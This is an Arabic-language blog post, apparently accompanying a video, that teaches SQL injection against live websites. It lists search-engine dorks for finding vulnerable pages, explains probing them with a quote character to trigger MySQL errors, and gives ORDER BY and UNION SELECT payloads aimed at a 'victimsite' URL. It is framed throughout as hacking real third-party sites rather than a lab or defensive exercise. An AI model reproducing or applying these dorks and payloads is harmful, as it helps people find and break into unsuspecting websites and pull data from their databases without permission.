SQL INJECTION
How to Hack a website using SQL INJECTION method?
هذه التدوينة هي الجزء الأول من الدرس الكامل الذي يتكلم حول ثغرة السكل انجيكشن. ستتكلم الدوينة على جميع ما ذكر في الفيديو ولكن بشئ مختصر
الـ دورك الثغرة : هناك العديد من الدوارك ولكن سأعطيك ثلاث دوارك شغالة بإذن لله ما عليك سوى وضعها في محركات البحث
الدوارك هي
- inurl:index.php?id=
- inurl:gallery.php?id=
- inurl:article.php?id=
- inurl:pageid=
انسخ الدورك وضعه في محرك البحث لتحصل على المواقع المصابة بهذه الثغرة
فحص الثغرة: كيف تتعرف على ان المواقع مصاب بالثغرة ام لاء؟
الفحص بسيط ما عليك سو إضافة إشارة بسيطة واذا واجهت خطأ فإذن الموقع مصاب بالثغرة
'
"
انا استخدم الإشارة الأولى ولكن بعض الاحيان استخدم الثاني للتأكد من وجود الثغرة
الخطأ غالبا يظهر كهذا
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
قد تختلف من موقع الى اخر ولكن المعنى واحد
الوصول الى عدد الأعمدة: للوصول الى الأعمدة اتبع الأمر التالي
www.victimsite.com/index.php/id?=2 ORDER BY N
طبعا الجزء المكبر هو الأمر ام الباقي فهو الرابط المواقع المصاب بالغرة
للوصول الى العدد بسرعة شاهد الفيديو الموجود اسفل التدوينة
عدد الأعمدة المصاب:معرفة عدد الأعمدة المصابة
لنفرض كان عدد الاعمدة الموجودة في الموقع المصاب بالثغرة هو ١٣
ما عليك سوى كتابة
www.victimsite.com/index.php/id?=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--
وستظهر لك عدد الأعمدة المصابة
انتهى الشرح لمشاهدة الفيديو اضغط على المربع الموجود اسفل التدوينة
https://www.youtube.com/watch?v=oX3261r1bBQ&feature=youtu.be
